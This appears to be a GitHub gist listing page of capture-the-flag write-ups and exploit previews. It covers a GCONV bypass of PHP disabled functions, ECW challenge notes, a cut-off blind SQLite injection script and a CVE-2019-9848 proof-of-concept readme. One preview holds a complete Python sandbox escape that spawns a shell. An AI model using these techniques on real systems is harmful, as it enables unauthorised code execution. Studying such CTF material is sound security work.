Load. LoadLow

@LoadLow
LoadLow / Readme.md
Last active August 14, 2023 13:55
Bypass shell_exec or system disabled functions by using GCONV (PHP rce to system())

This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

Credits: @hugeh0ge

It uses iconv in PHP to execute the same payload.

Use cases:

  • You control the first parameter of iconv (in_charset), you can set an environment variable, you can upload arbitrary files (the .so library and the gconv-modules file) and you know their path.
  • You have a PHP RCE but system, shell_exec, curl_exec and other functions are disabled, while you can still setenv (and LD_PRELOAD is blacklisted).
@LoadLow
LoadLow / Readme.md
Last active October 21, 2019 21:22
ECW Prequals - Challenge "PLC Manager"

It was a .jar file.

We just had to decompile it, analyze the protocol a bit and find a way to write all the bits in memory to 1 instead of reading them, in order to "unlock all the doors".

@LoadLow
LoadLow / Readme.md
Last active October 21, 2019 21:15
ECW Prequals - Challenge "Sploit_Win"

Win64 PE with some protections...

ASLR : True
DEP : True
SEH : False
CFG : False
[*] Listing imported DLLs...
        WS2_32.dll
        KERNEL32.dll
@LoadLow
LoadLow / decode.py
Last active October 21, 2019 21:13
ECW Prequals - Challenge "Puzzle"
#!/usr/bin/env python
"""
Modbus Message Parser
--------------------------------------------------------------------------
"""
from __future__ import print_function
import codecs as c
import types
@LoadLow
LoadLow / Readme.md
Last active October 22, 2019 12:33
ECW Prequals - Challenge "Mysudo"

Static binary, PIE + ASLR + NX, probably not a BoF with a shellcode

I've exploited another BoF on the mruby file format / file reader

It was easier, I just had to trigger an error to avoid the setuid that drops privileges.

@LoadLow
LoadLow / bypass.py
Last active October 21, 2019 21:14
ECW Prequals - Challenge "Matrix"
a1 = "\x73\x79\x73" # sys
a2 = "\x6f\x73" # os
a3 = "\x73\x68" # sh
a4 = "\x73\x79\x73\x74\x65\x6d" #system
a5 = getattr([].__class__.__mro__[1].__subclasses__()[104].__init__.__globals__[a1].modules[a2],a4)
a5(a3)
@LoadLow
LoadLow / blind_sqlite.js
Last active October 22, 2019 13:38
ECW Prequals - Challenge "SecureVault"
var encrypt = new JSEncrypt();
encrypt.setPublicKey($('#pubkey').val());
var fnd = false;
for(var i = 0; i < 1000; ++i) {
var asciimin = 0x20;
var asciimax = 126
var min;

import scapy
from scapy_ssl_tls.ssl_tls import *
from socket import *
cc = socket(AF_INET, SOCK_STREAM)
cc.connect(("127.0.0.1", 25))
print(str(cc.recv(1024)))
cc.send('ehlo localhost\r\n')
@LoadLow
LoadLow / Readme.md
Last active August 18, 2019 12:31
POC/MSF module for CVE-2019-9848, on dom-loaded event (triggered just after opening the document) and still working on 6.2.5

----------------------------------------------------------------------------------
-- Create Date: 09:43:04 03/16/2018
-- Design Name:
-- Module Name: ethernet_controller - Behavioral
-- Project Name: Controller
-- Description: 100mbps ethernet controller
--
-- Dependencies: lfsr25, ethernet_spec
----------------------------------------------------------------------------------
library ieee;